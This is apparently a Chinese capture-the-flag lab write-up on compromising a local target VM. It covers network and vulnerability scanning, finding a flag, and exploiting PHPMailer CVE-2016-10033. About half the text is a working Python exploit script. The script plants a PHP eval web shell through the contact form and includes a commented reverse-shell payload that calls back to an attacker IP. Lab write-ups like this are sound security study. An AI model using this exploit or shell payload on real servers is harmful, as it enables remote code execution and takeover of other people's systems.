靶机搭建后网卡同一设置成 NAT 模式
查询主机 IP
通过 Nmap 进行同一网段下主机 IP 扫描 (之前扫错网段 192.168.0.0 所以没有扫描成功)
nmap -sn 192.168.5.0/24
找到目标 IP:
对 IP 地址进行扫描,找到开放端口等信息
使用 Xray 进行漏洞扫描
Xray 扫描结果:
http://192.168.5.144/.DS_Store
通过 afrog 扫描到以下信息
很有可能存在 RCE 漏洞
用 Xray 再次漏扫:
xray_windows_amd64.exe webscan --basic-crawler http://192.168.5.144/ --html-output 2.html
使用御剑进行后台扫描:
http://192.168.5.144/manual/en/index.html
http://192.168.5.144/css/
http://192.168.5.144/img/
http://192.168.5.144/vendor/?C=S;O=A
通过 Index of /vendor 找到版本信息和 flag1
5.2.16
/var/www/html/vendor/
flag1{a2c1f66d2b8051bd3a5874b5b6e43e21}
通过 searchsploit 漏洞查找工具可知 PHPMailer 5.2.18 存在 RCE 漏洞
这也和 afrog 的查找结果相符
通过查找 PHPMailer 5.2.18 相关信息找到其漏洞编号和提权思路
通过运行 EXP 脚本获取 Shell 地址
"""
# Exploit Title: PHPMailer Exploit v1.0
# Date: 29/12/2016
# Exploit Author: Daniel aka anarc0der
# Version: PHPMailer < 5.2.18
# Tested on: Arch Linux
# CVE : CVE 2016-10033
Description:
Exploiting PHPMail with back connection (reverse shell) from the target
Usage:
1 - Download docker vulnerable enviroment at: https://github.com/opsxcq/exploit-CVE-2016-10033
2 - Config your IP for reverse shell on payload variable
4 - Open nc listener in one terminal: $ nc -lnvp <your ip>
3 - Open other terminal and run the exploit: python3 anarcoder.py
Video PoC: https://www.youtube.com/watch?v=DXeZxKr-qsU
Full Advisory:
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
"""
from requests_toolbelt import MultipartEncoder
import requests
import os
import base64
from lxml import html as lh
os.system('clear')
print("\n")
print(" █████╗ ███╗ ██╗ █████╗ ██████╗ ██████╗ ██████╗ ██████╗ ███████╗██████╗ ")
print("██╔══██╗████╗ ██║██╔══██╗██╔══██╗██╔════╝██╔═══██╗██╔══██╗██╔════╝██╔══██╗")
print("███████║██╔██╗ ██║███████║██████╔╝██║ ██║ ██║██║ ██║█████╗ ██████╔╝")
print("██╔══██║██║╚██╗██║██╔══██║██╔══██╗██║ ██║ ██║██║ ██║██╔══╝ ██╔══██╗")
print("██║ ██║██║ ╚████║██║ ██║██║ ██║╚██████╗╚██████╔╝██████╔╝███████╗██║ ██║")
print("╚═╝ ╚═╝╚═╝ ╚═══╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝╚═╝ ╚═╝")
print(" PHPMailer Exploit CVE 2016-10033 - anarcoder at protonmail.com")
print(" Version 1.0 - github.com/anarcoder - greetings opsxcq & David Golunski\n")
# target = 'http://localhost:8080'
target = 'http://192.168.5.144/'
vuln = "/contact.php"
# backdoor = '/backdoor.php'
backdoor = '/shell.php'
# payload = '<?php system(\'python -c """import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\'192.168.0.12\\\',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"])"""\'); ?>'
payload = '<?php @eval($_REQUEST[777]);phpinfo();?>'
fields={'action': 'submit',
'name': payload,
# 'email': '"anarcoder\\\" -OQueueDirectory=/tmp -X/www/backdoor.php server\" @protonmail.com',
'email': '"anarcoder\\\" -OQueueDirectory=/tmp -X/var/www/html/shell.php server\" @protonmail.com',
'message': 'Pwned'}
m = MultipartEncoder(fields=fields,
boundary='----WebKitFormBoundaryzXJpHSq4mNy35tHe')
# headers={'User-Agent': 'curl/7.47.0',
headers={'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36',
'Content-Type': m.content_type}
proxies = {'http': 'localhost:8081', 'https':'localhost:8081'}
print('[+] SeNdiNG eVIl SHeLL To TaRGeT....')
# r = requests.post(target, data=m.to_string(),
r = requests.post(target + vuln, data=m.to_string(),
headers=headers)
print('[+] SPaWNiNG eVIL sHeLL..... bOOOOM :D')
r = requests.get(target+backdoor, headers=headers)
if r.status_code == 200:
# print('[+] ExPLoITeD ' + target)
print('[+] ExPLoITeD ' + target + backdoor)
http://192.168.5.144//shell.php //shell地址
蚁剑连接
反弹shell ……没弹成功…………
止步于此……